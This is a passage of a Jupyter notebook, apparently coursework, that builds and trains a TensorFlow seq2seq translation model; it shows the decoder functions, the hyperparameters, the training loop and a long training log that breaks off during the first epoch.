"### Decoding - Training\nCreate training logits using [`tf.contrib.seq2seq.simple_decoder_fn_train()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/simple_decoder_fn_train) and [`tf.contrib.seq2seq.dynamic_rnn_decoder()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/dynamic_rnn_decoder). Apply the `output_fn` to the [`tf.contrib.seq2seq.dynamic_rnn_decoder()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/dynamic_rnn_decoder) outputs.",
"_____no_output_____"
]
],
[
[
"def decoding_layer_train(encoder_state, dec_cell, dec_embed_input, sequence_length, decoding_scope,\n output_fn, keep_prob):\n \"\"\"\n Create a decoding layer for training\n :param encoder_state: Encoder State\n :param dec_cell: Decoder RNN Cell\n :param dec_embed_input: Decoder embedded input\n :param sequence_length: Sequence Length\n :param decoding_scope: TenorFlow Variable Scope for decoding\n :param output_fn: Function to apply the output layer\n :param keep_prob: Dropout keep probability\n :return: Train Logits\n \"\"\"\n # TODO: Implement Function\n decoder_fn_train = tf.contrib.seq2seq.simple_decoder_fn_train(encoder_state)\n outputs,final_state,final_context_state = tf.contrib.seq2seq.dynamic_rnn_decoder\\\n (dec_cell,decoder_fn_train,dec_embed_input,sequence_length,scope=decoding_scope)\n \n train_logits = output_fn(outputs)\n train_logits = tf.nn.dropout(train_logits,keep_prob)\n \n return train_logits\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_decoding_layer_train(decoding_layer_train)",
"Tests Passed\n"
]
],
[
[
"### Decoding - Inference\nCreate inference logits using [`tf.contrib.seq2seq.simple_decoder_fn_inference()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/simple_decoder_fn_inference) and [`tf.contrib.seq2seq.dynamic_rnn_decoder()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/dynamic_rnn_decoder). ",
"_____no_output_____"
]
],
[
[
"def decoding_layer_infer(encoder_state, dec_cell, dec_embeddings, start_of_sequence_id, end_of_sequence_id,\n maximum_length, vocab_size, decoding_scope, output_fn, keep_prob):\n \"\"\"\n Create a decoding layer for inference\n :param encoder_state: Encoder state\n :param dec_cell: Decoder RNN Cell\n :param dec_embeddings: Decoder embeddings\n :param start_of_sequence_id: GO ID\n :param end_of_sequence_id: EOS Id\n :param maximum_length: The maximum allowed time steps to decode\n :param vocab_size: Size of vocabulary\n :param decoding_scope: TensorFlow Variable Scope for decoding\n :param output_fn: Function to apply the output layer\n :param keep_prob: Dropout keep probability\n :return: Inference Logits\n \"\"\"\n # TODO: Implement Function\n decoder_fn_inference = tf.contrib.seq2seq.simple_decoder_fn_inference\\\n (output_fn,encoder_state,dec_embeddings,start_of_sequence_id,end_of_sequence_id,maximum_length,vocab_size)\n \n outputs_logits,_,_ = tf.contrib.seq2seq.dynamic_rnn_decoder\\\n (dec_cell,decoder_fn_inference,scope=decoding_scope)\n \n inference_logits = tf.nn.dropout(outputs_logits, tf.to_float(keep_prob))\n \n return inference_logits\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_decoding_layer_infer(decoding_layer_infer)",
"Tests Passed\n"
]
],
[
[
"### Build the Decoding Layer\nImplement `decoding_layer()` to create a Decoder RNN layer.\n\n- Create RNN cell for decoding using `rnn_size` and `num_layers`.\n- Create the output fuction using [`lambda`](https://docs.python.org/3/tutorial/controlflow.html#lambda-expressions) to transform it's input, logits, to class logits.\n- Use the your `decoding_layer_train(encoder_state, dec_cell, dec_embed_input, sequence_length, decoding_scope, output_fn, keep_prob)` function to get the training logits.\n- Use your `decoding_layer_infer(encoder_state, dec_cell, dec_embeddings, start_of_sequence_id, end_of_sequence_id, maximum_length, vocab_size, decoding_scope, output_fn, keep_prob)` function to get the inference logits.\n\nNote: You'll need to use [tf.variable_scope](https://www.tensorflow.org/api_docs/python/tf/variable_scope) to share variables between training and inference.",
"_____no_output_____"
]
],
[
[
"def decoding_layer(dec_embed_input, dec_embeddings, encoder_state, vocab_size, sequence_length, rnn_size,\n num_layers, target_vocab_to_int, keep_prob):\n \"\"\"\n Create decoding layer\n :param dec_embed_input: Decoder embedded input\n :param dec_embeddings: Decoder embeddings\n :param encoder_state: The encoded state\n :param vocab_size: Size of vocabulary\n :param sequence_length: Sequence Length\n :param rnn_size: RNN Size\n :param num_layers: Number of layers\n :param target_vocab_to_int: Dictionary to go from the target words to an id\n :param keep_prob: Dropout keep probability\n :return: Tuple of (Training Logits, Inference Logits)\n \"\"\"\n # TODO: Implement Function\n #Decoding rnn cell \n dec_cell = tf.contrib.rnn.BasicLSTMCell(rnn_size)\n dec_cell = tf.contrib.rnn.DropoutWrapper(dec_cell,output_keep_prob=keep_prob)\n dec_cell = tf.contrib.rnn.MultiRNNCell([dec_cell] * num_layers)\n \n #transforming it's input, logits, to class logits\n with tf.variable_scope('decoding') as decoding_scope:\n output_fn = lambda x: tf.contrib.layers.fully_connected(x,vocab_size,None,scope=decoding_scope)\n \n #getting the training logits\n training_logits = decoding_layer_train(encoder_state,dec_cell,dec_embed_input,\\\n sequence_length,decoding_scope,output_fn,keep_prob)\n #getting the inference logits\n with tf.variable_scope(\"decoding\", reuse=True) as decoding_scope:\n inference_logits = decoding_layer_infer\\\n (encoder_state,dec_cell,dec_embeddings,target_vocab_to_int['<GO>'],target_vocab_to_int['<EOS>'],\\\n sequence_length,vocab_size,decoding_scope,output_fn,keep_prob) \n \n return training_logits,inference_logits\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_decoding_layer(decoding_layer)",
"Tests Passed\n"
]
],
[
[
"### Build the Neural Network\nApply the functions you implemented above to:\n\n- Apply embedding to the input data for the encoder.\n- Encode the input using your `encoding_layer(rnn_inputs, rnn_size, num_layers, keep_prob)`.\n- Process target data using your `process_decoding_input(target_data, target_vocab_to_int, batch_size)` function.\n- Apply embedding to the target data for the decoder.\n- Decode the encoded input using your `decoding_layer(dec_embed_input, dec_embeddings, encoder_state, vocab_size, sequence_length, rnn_size, num_layers, target_vocab_to_int, keep_prob)`.",
"_____no_output_____"
]
],
[
[
"def seq2seq_model(input_data, target_data, keep_prob, batch_size, sequence_length, source_vocab_size, target_vocab_size,\n enc_embedding_size, dec_embedding_size, rnn_size, num_layers, target_vocab_to_int):\n \"\"\"\n Build the Sequence-to-Sequence part of the neural network\n :param input_data: Input placeholder\n :param target_data: Target placeholder\n :param keep_prob: Dropout keep probability placeholder\n :param batch_size: Batch Size\n :param sequence_length: Sequence Length\n :param source_vocab_size: Source vocabulary size\n :param target_vocab_size: Target vocabulary size\n :param enc_embedding_size: Decoder embedding size\n :param dec_embedding_size: Encoder embedding size\n :param rnn_size: RNN Size\n :param num_layers: Number of layers\n :param target_vocab_to_int: Dictionary to go from the target words to an id\n :return: Tuple of (Training Logits, Inference Logits)\n \"\"\"\n # TODO: Implement Function\n #Applying embedding to the input data for the encoder\n encoding_input = tf.contrib.layers.embed_sequence(input_data,source_vocab_size,enc_embedding_size)\n \n #Encoding the input\n encoder_state = encoding_layer(encoding_input,rnn_size,num_layers,keep_prob)\n \n #Process target data\n target_data = process_decoding_input(target_data,target_vocab_to_int,batch_size)\n \n #Appling embedding to the target data for the decoder\n dec_embeddings = tf.Variable(tf.random_uniform([target_vocab_size, dec_embedding_size]))\n dec_embed_input = tf.nn.embedding_lookup(dec_embeddings, target_data)\n \n #Decoding the encoded input\n training_logits,inference_logits = decoding_layer\\\n (dec_embed_input,dec_embeddings,encoder_state,target_vocab_size,sequence_length,rnn_size,num_layers,\\\n target_vocab_to_int,keep_prob)\n\n return training_logits,inference_logits\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_seq2seq_model(seq2seq_model)",
"Tests Passed\n"
]
],
[
[
"## Neural Network Training\n### Hyperparameters\nTune the following parameters:\n\n- Set `epochs` to the number of epochs.\n- Set `batch_size` to the batch size.\n- Set `rnn_size` to the size of the RNNs.\n- Set `num_layers` to the number of layers.\n- Set `encoding_embedding_size` to the size of the embedding for the encoder.\n- Set `decoding_embedding_size` to the size of the embedding for the decoder.\n- Set `learning_rate` to the learning rate.\n- Set `keep_probability` to the Dropout keep probability",
"_____no_output_____"
]
],
[
[
"# Number of Epochs\nepochs = 3 #10\n# Batch Size\nbatch_size = 256\n# RNN Size\nrnn_size = 256\n# Number of Layers\nnum_layers = 2\n# Embedding Size\nencoding_embedding_size = 200\ndecoding_embedding_size = 200\n# Learning Rate\nlearning_rate = 0.01 #0.001\n# Dropout Keep Probability\nkeep_probability = 0.8",
"_____no_output_____"
]
],
[
[
"### Build the Graph\nBuild the graph using the neural network you implemented.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nsave_path = 'checkpoints/dev'\n(source_int_text, target_int_text), (source_vocab_to_int, target_vocab_to_int), _ = helper.load_preprocess()\nmax_source_sentence_length = max([len(sentence) for sentence in source_int_text])\n\ntrain_graph = tf.Graph()\nwith train_graph.as_default():\n input_data, targets, lr, keep_prob = model_inputs()\n sequence_length = tf.placeholder_with_default(max_source_sentence_length, None, name='sequence_length')\n input_shape = tf.shape(input_data)\n \n train_logits, inference_logits = seq2seq_model(\n tf.reverse(input_data, [-1]), targets, keep_prob, batch_size, sequence_length, len(source_vocab_to_int), len(target_vocab_to_int),\n encoding_embedding_size, decoding_embedding_size, rnn_size, num_layers, target_vocab_to_int)\n\n tf.identity(inference_logits, 'logits')\n with tf.name_scope(\"optimization\"):\n # Loss function\n cost = tf.contrib.seq2seq.sequence_loss(\n train_logits,\n targets,\n tf.ones([input_shape[0], sequence_length]))\n\n # Optimizer\n optimizer = tf.train.AdamOptimizer(lr)\n\n # Gradient Clipping\n gradients = optimizer.compute_gradients(cost)\n capped_gradients = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gradients if grad is not None]\n train_op = optimizer.apply_gradients(capped_gradients)",
"_____no_output_____"
]
],
[
[
"### Train\nTrain the neural network on the preprocessed data. If you have a hard time getting a good loss, check the forums to see if anyone is having the same problem.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport time\n\ndef get_accuracy(target, logits):\n \"\"\"\n Calculate accuracy\n \"\"\"\n max_seq = max(target.shape[1], logits.shape[1])\n if max_seq - target.shape[1]:\n target = np.pad(\n target,\n [(0,0),(0,max_seq - target.shape[1])],\n 'constant')\n if max_seq - logits.shape[1]:\n logits = np.pad(\n logits,\n [(0,0),(0,max_seq - logits.shape[1]), (0,0)],\n 'constant')\n\n return np.mean(np.equal(target, np.argmax(logits, 2)))\n\ntrain_source = source_int_text[batch_size:]\ntrain_target = target_int_text[batch_size:]\n\nvalid_source = helper.pad_sentence_batch(source_int_text[:batch_size])\nvalid_target = helper.pad_sentence_batch(target_int_text[:batch_size])\n\nwith tf.Session(graph=train_graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n for epoch_i in range(epochs):\n for batch_i, (source_batch, target_batch) in enumerate(\n helper.batch_data(train_source, train_target, batch_size)):\n start_time = time.time()\n \n _, loss = sess.run(\n [train_op, cost],\n {input_data: source_batch,\n targets: target_batch,\n lr: learning_rate,\n sequence_length: target_batch.shape[1],\n keep_prob: keep_probability})\n \n batch_train_logits = sess.run(\n inference_logits,\n {input_data: source_batch, keep_prob: 1.0})\n batch_valid_logits = sess.run(\n inference_logits,\n {input_data: valid_source, keep_prob: 1.0})\n \n train_acc = get_accuracy(target_batch, batch_train_logits)\n valid_acc = get_accuracy(np.array(valid_target), batch_valid_logits)\n end_time = time.time()\n print('Epoch {:>3} Batch {:>4}/{} - Train Accuracy: {:>6.3f}, Validation Accuracy: {:>6.3f}, Loss: {:>6.3f}'\n .format(epoch_i, batch_i, len(source_int_text) // batch_size, train_acc, valid_acc, loss))\n\n # Save Model\n saver = tf.train.Saver()\n saver.save(sess, save_path)\n print('Model Trained and Saved')",
"Epoch 0 Batch 0/538 - Train Accuracy: 0.234, Validation Accuracy: 0.316, Loss: 5.901\nEpoch 0 Batch 1/538 - Train Accuracy: 0.169, Validation Accuracy: 0.238, Loss: 4.838\nEpoch 0 Batch 2/538 - Train Accuracy: 0.165, Validation Accuracy: 0.238, Loss: 5.141\nEpoch 0 Batch 3/538 - Train Accuracy: 0.241, Validation Accuracy: 0.328, Loss: 4.593\nEpoch 0 Batch 4/538 - Train Accuracy: 0.185, Validation Accuracy: 0.253, Loss: 4.467\nEpoch 0 Batch 5/538 - Train Accuracy: 0.304, Validation Accuracy: 0.350, Loss: 4.247\nEpoch 0 Batch 6/538 - Train Accuracy: 0.312, Validation Accuracy: 0.353, Loss: 3.992\nEpoch 0 Batch 7/538 - Train Accuracy: 0.287, Validation Accuracy: 0.352, Loss: 3.988\nEpoch 0 Batch 8/538 - Train Accuracy: 0.284, Validation Accuracy: 0.352, Loss: 3.918\nEpoch 0 Batch 9/538 - Train Accuracy: 0.286, Validation Accuracy: 0.352, Loss: 3.891\nEpoch 0 Batch 10/538 - Train Accuracy: 0.267, Validation Accuracy: 0.352, Loss: 3.911\nEpoch 0 Batch 11/538 - Train Accuracy: 0.279, Validation Accuracy: 0.352, Loss: 3.832\nEpoch 0 Batch 12/538 - Train Accuracy: 0.277, Validation Accuracy: 0.353, Loss: 3.777\nEpoch 0 Batch 13/538 - Train Accuracy: 0.355, Validation Accuracy: 0.382, Loss: 3.552\nEpoch 0 Batch 14/538 - Train Accuracy: 0.321, Validation Accuracy: 0.385, Loss: 3.612\nEpoch 0 Batch 15/538 - Train Accuracy: 0.363, Validation Accuracy: 0.389, Loss: 3.513\nEpoch 0 Batch 16/538 - Train Accuracy: 0.347, Validation Accuracy: 0.388, Loss: 3.487\nEpoch 0 Batch 17/538 - Train Accuracy: 0.334, Validation Accuracy: 0.393, Loss: 3.537\nEpoch 0 Batch 18/538 - Train Accuracy: 0.322, Validation Accuracy: 0.390, Loss: 3.559\nEpoch 0 Batch 19/538 - Train Accuracy: 0.328, Validation Accuracy: 0.397, Loss: 3.527\nEpoch 0 Batch 20/538 - Train Accuracy: 0.375, Validation Accuracy: 0.414, Loss: 3.404\nEpoch 0 Batch 21/538 - Train Accuracy: 0.308, Validation Accuracy: 0.406, Loss: 3.532\nEpoch 0 Batch 22/538 - Train Accuracy: 0.343, Validation Accuracy: 0.406, Loss: 3.433\nEpoch 0 Batch 23/538 - Train Accuracy: 0.353, Validation Accuracy: 0.410, Loss: 3.431\nEpoch 0 Batch 24/538 - Train Accuracy: 0.379, Validation Accuracy: 0.417, Loss: 3.336\nEpoch 0 Batch 25/538 - Train Accuracy: 0.368, Validation Accuracy: 0.421, Loss: 3.321\nEpoch 0 Batch 26/538 - Train Accuracy: 0.377, Validation Accuracy: 0.435, Loss: 3.348\nEpoch 0 Batch 27/538 - Train Accuracy: 0.384, Validation Accuracy: 0.433, Loss: 3.347\nEpoch 0 Batch 28/538 - Train Accuracy: 0.433, Validation Accuracy: 0.437, Loss: 3.119\nEpoch 0 Batch 29/538 - Train Accuracy: 0.403, Validation Accuracy: 0.445, Loss: 3.212\nEpoch 0 Batch 30/538 - Train Accuracy: 0.392, Validation Accuracy: 0.456, Loss: 3.302\nEpoch 0 Batch 31/538 - Train Accuracy: 0.426, Validation Accuracy: 0.458, Loss: 3.131\nEpoch 0 Batch 32/538 - Train Accuracy: 0.419, Validation Accuracy: 0.472, Loss: 3.183\nEpoch 0 Batch 33/538 - Train Accuracy: 0.423, Validation Accuracy: 0.463, Loss: 3.086\nEpoch 0 Batch 34/538 - Train Accuracy: 0.422, Validation Accuracy: 0.476, Loss: 3.176\nEpoch 0 Batch 35/538 - Train Accuracy: 0.409, Validation Accuracy: 0.471, Loss: 3.150\nEpoch 0 Batch 36/538 - Train Accuracy: 0.435, Validation Accuracy: 0.476, Loss: 3.009\nEpoch 0 Batch 37/538 - Train Accuracy: 0.450, Validation Accuracy: 0.487, Loss: 3.045\nEpoch 0 Batch 38/538 - Train Accuracy: 0.429, Validation Accuracy: 0.491, Loss: 3.101\nEpoch 0 Batch 39/538 - Train Accuracy: 0.438, Validation Accuracy: 0.494, Loss: 3.058\nEpoch 0 Batch 40/538 - Train Accuracy: 0.499, Validation Accuracy: 0.498, Loss: 2.849\nEpoch 0 Batch 41/538 - Train Accuracy: 0.435, Validation Accuracy: 0.497, Loss: 3.053\nEpoch 0 Batch 42/538 - Train Accuracy: 0.437, Validation Accuracy: 0.488, Loss: 2.964\nEpoch 0 Batch 43/538 - Train Accuracy: 0.474, Validation Accuracy: 0.512, Loss: 2.975\nEpoch 0 Batch 44/538 - Train Accuracy: 0.441, Validation Accuracy: 0.504, Loss: 3.028\nEpoch 0 Batch 45/538 - Train Accuracy: 0.466, Validation Accuracy: 0.499, Loss: 2.831\nEpoch 0 Batch 46/538 - Train Accuracy: 0.464, Validation Accuracy: 0.506, Loss: 2.915\nEpoch 0 Batch 47/538 - Train Accuracy: 0.484, Validation Accuracy: 0.509, Loss: 2.832\nEpoch 0 Batch 48/538 - Train Accuracy: 0.472, Validation Accuracy: 0.493, Loss: 2.745\nEpoch 0 Batch 49/538 - Train Accuracy: 0.457, Validation Accuracy: 0.512, Loss: 2.908\nEpoch 0 Batch 50/538 - Train Accuracy: 0.484, Validation Accuracy: 0.516, Loss: 2.791\nEpoch 0 Batch 51/538 - Train Accuracy: 0.384, Validation Accuracy: 0.499, Loss: 2.945\nEpoch 0 Batch 52/538 - Train Accuracy: 0.474, Validation Accuracy: 0.518, Loss: 2.764\nEpoch 0 Batch 53/538 - Train Accuracy: 0.514, Validation Accuracy: 0.522, Loss: 2.604\nEpoch 0 Batch 54/538 - Train Accuracy: 0.452, Validation Accuracy: 0.510, Loss: 2.689\nEpoch 0 Batch 55/538 - Train Accuracy: 0.455, Validation Accuracy: 0.515, Loss: 2.767\nEpoch 0 Batch 56/538 - Train Accuracy: 0.489, Validation Accuracy: 0.526, Loss: 2.675\nEpoch 0 Batch 57/538 - Train Accuracy: 0.448, Validation Accuracy: 0.525, Loss: 2.727\nEpoch 0 Batch 58/538 - Train Accuracy: 0.439, Validation Accuracy: 0.515, Loss: 2.701\nEpoch 0 Batch 59/538 - Train Accuracy: 0.469, Validation Accuracy: 0.529, Loss: 2.613\nEpoch 0 Batch 60/538 - Train Accuracy: 0.475, Validation Accuracy: 0.527, Loss: 2.561\nEpoch 0 Batch 61/538 - Train Accuracy: 0.459, Validation Accuracy: 0.520, Loss: 2.545\nEpoch 0 Batch 62/538 - Train Accuracy: 0.499, Validation Accuracy: 0.529, Loss: 2.485\nEpoch 0 Batch 63/538 - Train Accuracy: 0.494, Validation Accuracy: 0.531, Loss: 2.403\nEpoch 0 Batch 64/538 - Train Accuracy: 0.486, Validation Accuracy: 0.514, Loss: 2.413\nEpoch 0 Batch 65/538 - Train Accuracy: 0.459, Validation Accuracy: 0.530, Loss: 2.468\nEpoch 0 Batch 66/538 - Train Accuracy: 0.506, Validation Accuracy: 0.538, Loss: 2.306\nEpoch 0 Batch 67/538 - Train Accuracy: 0.497, Validation Accuracy: 0.522, Loss: 2.400\nEpoch 0 Batch 68/538 - Train Accuracy: 0.505, Validation Accuracy: 0.528, Loss: 2.223\nEpoch 0 Batch 69/538 - Train Accuracy: 0.438, Validation Accuracy: 0.493, Loss: 2.302\nEpoch 0 Batch 70/538 - Train Accuracy: 0.445, Validation Accuracy: 0.481, Loss: 2.247\nEpoch 0 Batch 71/538 - Train Accuracy: 0.426, Validation Accuracy: 0.481, Loss: 2.220\nEpoch 0 Batch 72/538 - Train Accuracy: 0.462, Validation Accuracy: 0.480, Loss: 2.104\nEpoch 0 Batch 73/538 - Train Accuracy: 0.413, Validation Accuracy: 0.474, Loss: 2.194\nEpoch 0 Batch 74/538 - Train Accuracy: 0.465, Validation Accuracy: 0.485, Loss: 2.082\nEpoch 0 Batch 75/538 - Train Accuracy: 0.445, Validation Accuracy: 0.454, Loss: 2.097\nEpoch 0 Batch 76/538 - Train Accuracy: 0.414, Validation Accuracy: 0.457, Loss: 2.105\nEpoch 0 Batch 77/538 - Train Accuracy: 0.400, Validation Accuracy: 0.449, Loss: 2.040\nEpoch 0 Batch 78/538 - Train Accuracy: 0.437, Validation Accuracy: 0.450, Loss: 2.047\nEpoch 0 Batch 79/538 - Train Accuracy: 0.425, Validation Accuracy: 0.453, Loss: 1.973\nEpoch 0 Batch 80/538 - Train Accuracy: 0.407, Validation Accuracy: 0.463, Loss: 2.045\nEpoch 0 Batch 81/538 - Train Accuracy: 0.402, Validation Accuracy: 0.464, Loss: 1.997\nEpoch 0 Batch 82/538 - Train Accuracy: 0.482, Validation Accuracy: 0.504, Loss: 1.970\nEpoch 0 Batch 83/538 - Train Accuracy: 0.457, Validation Accuracy: 0.499, Loss: 2.001\nEpoch 0 Batch 84/538 - Train Accuracy: 0.500, Validation Accuracy: 0.506, Loss: 1.925\nEpoch 0 Batch 85/538 - Train Accuracy: 0.477, Validation Accuracy: 0.484, Loss: 1.847\nEpoch 0 Batch 86/538 - Train Accuracy: 0.404, Validation Accuracy: 0.460, Loss: 1.921\nEpoch 0 Batch 87/538 - Train Accuracy: 0.415, Validation Accuracy: 0.464, Loss: 1.884\nEpoch 0 Batch 88/538 - Train Accuracy: 0.471, Validation Accuracy: 0.514, Loss: 1.894\nEpoch 0 Batch 89/538 - Train Accuracy: 0.460, Validation Accuracy: 0.505, Loss: 1.857\nEpoch 0 Batch 90/538 - Train Accuracy: 0.504, Validation Accuracy: 0.529, Loss: 1.856\nEpoch 0 Batch 91/538 - Train Accuracy: 0.501, Validation Accuracy: 0.544, Loss: 1.859\nEpoch 0 Batch 92/538 - Train Accuracy: 0.491, Validation Accuracy: 0.534, Loss: 1.826\nEpoch 0 Batch 93/538 - Train Accuracy: 0.502, Validation Accuracy: 0.550, Loss: 1.829\nEpoch 0 Batch 94/538 - Train Accuracy: 0.489, Validation Accuracy: 0.540, Loss: 1.856\nEpoch 0 Batch 95/538 - Train Accuracy: 0.552, Validation Accuracy: 0.544, Loss: 1.740\nEpoch 0 Batch 96/538 - Train Accuracy: 0.537, Validation Accuracy: 0.543, Loss: 1.752\nEpoch 0 Batch 97/538 - Train Accuracy: 0.514, Validation Accuracy: 0.541, Loss: 1.756\nEpoch 0 Batch 98/538 - Train Accuracy: 0.526, Validation Accuracy: 0.534, Loss: 1.740\nEpoch 0 Batch 99/538 - Train Accuracy: 0.491, Validation Accuracy: 0.544, Loss: 1.777\nEpoch 0 Batch 100/538 - Train Accuracy: 0.526, Validation Accuracy: 0.543, Loss: 1.763\nEpoch 0 Batch 101/538 - Train Accuracy: 0.508, Validation Accuracy: 0.533, Loss: 1.800\nEpoch 0 Batch 102/538 - Train Accuracy: 0.522, Validation Accuracy: 0.553, Loss: 1.769\nEpoch 0 Batch 103/538 - Train Accuracy: 0.517, Validation Accuracy: 0.552, Loss: 1.756\nEpoch 0 Batch 104/538 - Train Accuracy: 0.539, Validation Accuracy: 0.559, Loss: 1.689\nEpoch 0 Batch 105/538 - Train Accuracy: 0.528, Validation Accuracy: 0.556, Loss: 1.722\nEpoch 0 Batch 106/538 - Train Accuracy: 0.504, Validation Accuracy: 0.562, Loss: 1.708\nEpoch 0 Batch 107/538 - Train Accuracy: 0.486, Validation Accuracy: 0.559, Loss: 1.736\nEpoch 0 Batch 108/538 - Train Accuracy: 0.536, Validation Accuracy: 0.567, Loss: 1.669\nEpoch 0 Batch 109/538 - Train Accuracy: 0.551, Validation Accuracy: 0.568, Loss: 1.662\nEpoch 0 Batch 110/538 - Train Accuracy: 0.526, Validation Accuracy: 0.559, Loss: 1.736\nEpoch 0 Batch 111/538 - Train Accuracy: 0.547, Validation Accuracy: 0.548, Loss: 1.650\nEpoch 0 Batch 112/538 - Train Accuracy: 0.549, Validation Accuracy: 0.555, Loss: 1.639\nEpoch 0 Batch 113/538 - Train Accuracy: 0.528, Validation Accuracy: 0.567, Loss: 1.689\nEpoch 0 Batch 114/538 - Train Accuracy: 0.575, Validation Accuracy: 0.566, Loss: 1.665\nEpoch 0 Batch 115/538 - Train Accuracy: 0.520, Validation Accuracy: 0.563, Loss: 1.712\nEpoch 0 Batch 116/538 - Train Accuracy: 0.529, Validation Accuracy: 0.567, Loss: 1.675\nEpoch 0 Batch 117/538 - Train Accuracy: 0.548, Validation Accuracy: 0.572, Loss: 1.623\nEpoch 0 Batch 118/538 - Train Accuracy: 0.564, Validation Accuracy: 0.573, Loss: 1.672\nEpoch 0 Batch 119/538 - Train Accuracy: 0.569, Validation Accuracy: 0.577, Loss: 1.600\nEpoch 0 Batch 120/538 - Train Accuracy: 0.546, Validation Accuracy: 0.573, Loss: 1.610\nEpoch 0 Batch 121/538 - Train Accuracy: 0.548, Validation Accuracy: 0.571, Loss: 1.623\nEpoch 0 Batch 122/538 - Train Accuracy: 0.549, Validation Accuracy: 0.579, Loss: 1.623\nEpoch 0 Batch 123/538 - Train Accuracy: 0.574, Validation Accuracy: 0.583, Loss: 1.607\nEpoch 0 Batch 124/538 - Train Accuracy: 0.552, Validation Accuracy: 0.585, Loss: 1.572\nEpoch 0 Batch 125/538 - Train Accuracy: 0.566, Validation Accuracy: 0.578, Loss: 1.648\nEpoch 0 Batch 126/538 - Train Accuracy: 0.593, Validation Accuracy: 0.576, Loss: 1.597\nEpoch 0 Batch 127/538 - Train Accuracy: 0.482, Validation Accuracy: 0.542, Loss: 1.667\nEpoch 0 Batch 128/538 - Train Accuracy: 0.544, Validation Accuracy: 0.563, Loss: 1.603\nEpoch 0 Batch 129/538 - Train Accuracy: 0.542, Validation Accuracy: 0.581, Loss: 1.599\nEpoch 0 Batch 130/538 - Train Accuracy: 0.556, Validation Accuracy: 0.582, Loss: 1.626\nEpoch 0 Batch 131/538 - Train Accuracy: 0.536, Validation Accuracy: 0.586, Loss: 1.595\nEpoch 0 Batch 132/538 - Train Accuracy: 0.560, Validation Accuracy: 0.576, Loss: 1.621\nEpoch 0 Batch 133/538 - Train Accuracy: 0.579, Validation Accuracy: 0.585, Loss: 1.553\nEpoch 0 Batch 134/538 - Train Accuracy: 0.524, Validation Accuracy: 0.586, Loss: 1.653\nEpoch 0 Batch 135/538 - Train Accuracy: 0.552, Validation Accuracy: 0.586, Loss: 1.566\nEpoch 0 Batch 136/538 - Train Accuracy: 0.559, Validation Accuracy: 0.587, Loss: 1.560\nEpoch 0 Batch 137/538 - Train Accuracy: 0.555, Validation Accuracy: 0.579, Loss: 1.538\nEpoch 0 Batch 138/538 - Train Accuracy: 0.561, Validation Accuracy: 0.602, Loss: 1.551\nEpoch 0 Batch 139/538 - Train Accuracy: 0.566, Validation Accuracy: 0.613, Loss: 1.640\nEpoch 0 Batch 140/538 - Train Accuracy: 0.547, Validation Accuracy: 0.609, Loss: 1.671\nEpoch 0 Batch 141/538 - Train Accuracy: 0.574, Validation Accuracy: 0.603, Loss: 1.601\nEpoch 0 Batch 142/538 - Train Accuracy: 0.609, Validation Accuracy: 0.605, Loss: 1.543\nEpoch 0 Batch 143/538 - Train Accuracy: 0.558, Validation Accuracy: 0.608, Loss: 1.560\nEpoch 0 Batch 144/538 - Train Accuracy: 0.586, Validation Accuracy: 0.612, Loss: 1.656\nEpoch 0 Batch 145/538 - Train Accuracy: 0.584, Validation Accuracy: 0.608, Loss: 1.572\nEpoch 0 Batch 146/538 - Train Accuracy: 0.600, Validation Accuracy: 0.613, Loss: 1.530\nEpoch 0 Batch 147/538 - Train Accuracy: 0.612, Validation Accuracy: 0.606, Loss: 1.570\nEpoch 0 Batch 148/538 - Train Accuracy: 0.550, Validation Accuracy: 0.606, Loss: 1.634\nEpoch 0 Batch 149/538 - Train Accuracy: 0.576, Validation Accuracy: 0.600, Loss: 1.525\nEpoch 0 Batch 150/538 - Train Accuracy: 0.544, Validation Accuracy: 0.587, Loss: 1.575\nEpoch 0 Batch 151/538 - Train Accuracy: 0.592, Validation Accuracy: 0.609, Loss: 1.546\nEpoch 0 Batch 152/538 - Train Accuracy: 0.613, Validation Accuracy: 0.616, Loss: 1.528\nEpoch 0 Batch 153/538 - Train Accuracy: 0.572, Validation Accuracy: 0.606, Loss: 1.535\nEpoch 0 Batch 154/538 - Train Accuracy: 0.611, Validation Accuracy: 0.618, Loss: 1.552\nEpoch 0 Batch 155/538 - Train Accuracy: 0.619, Validation Accuracy: 0.615, Loss: 1.496\nEpoch 0 Batch 156/538 - Train Accuracy: 0.580, Validation Accuracy: 0.617, Loss: 1.535\nEpoch 0 Batch 157/538 - Train Accuracy: 0.594, Validation Accuracy: 0.622, Loss: 1.516\nEpoch 0 Batch 158/538 - Train Accuracy: 0.571, Validation Accuracy: 0.610, Loss: 1.546\nEpoch 0 Batch 159/538 - Train Accuracy: 0.595, Validation Accuracy: 0.613, Loss: 1.564\nEpoch 0 Batch 160/538 - Train Accuracy: 0.586, Validation Accuracy: 0.613, Loss: 1.485\nEpoch 0 Batch 161/538 - Train Accuracy: 0.606, Validation Accuracy: 0.611, Loss: 1.475\nEpoch 0 Batch 162/538 - Train Accuracy: 0.627, Validation Accuracy: 0.620, Loss: 1.528\nEpoch 0 Batch 163/538 - Train Accuracy: 0.608, Validation Accuracy: 0.613, Loss: 1.517\nEpoch 0 Batch 164/538 - Train Accuracy: 0.596, Validation Accuracy: 0.619, Loss: 1.575\nEpoch 0 Batch 165/538 - Train Accuracy: 0.616, Validation Accuracy: 0.624, Loss: 1.461\nEpoch 0 Batch 166/538 - Train Accuracy: 0.626, 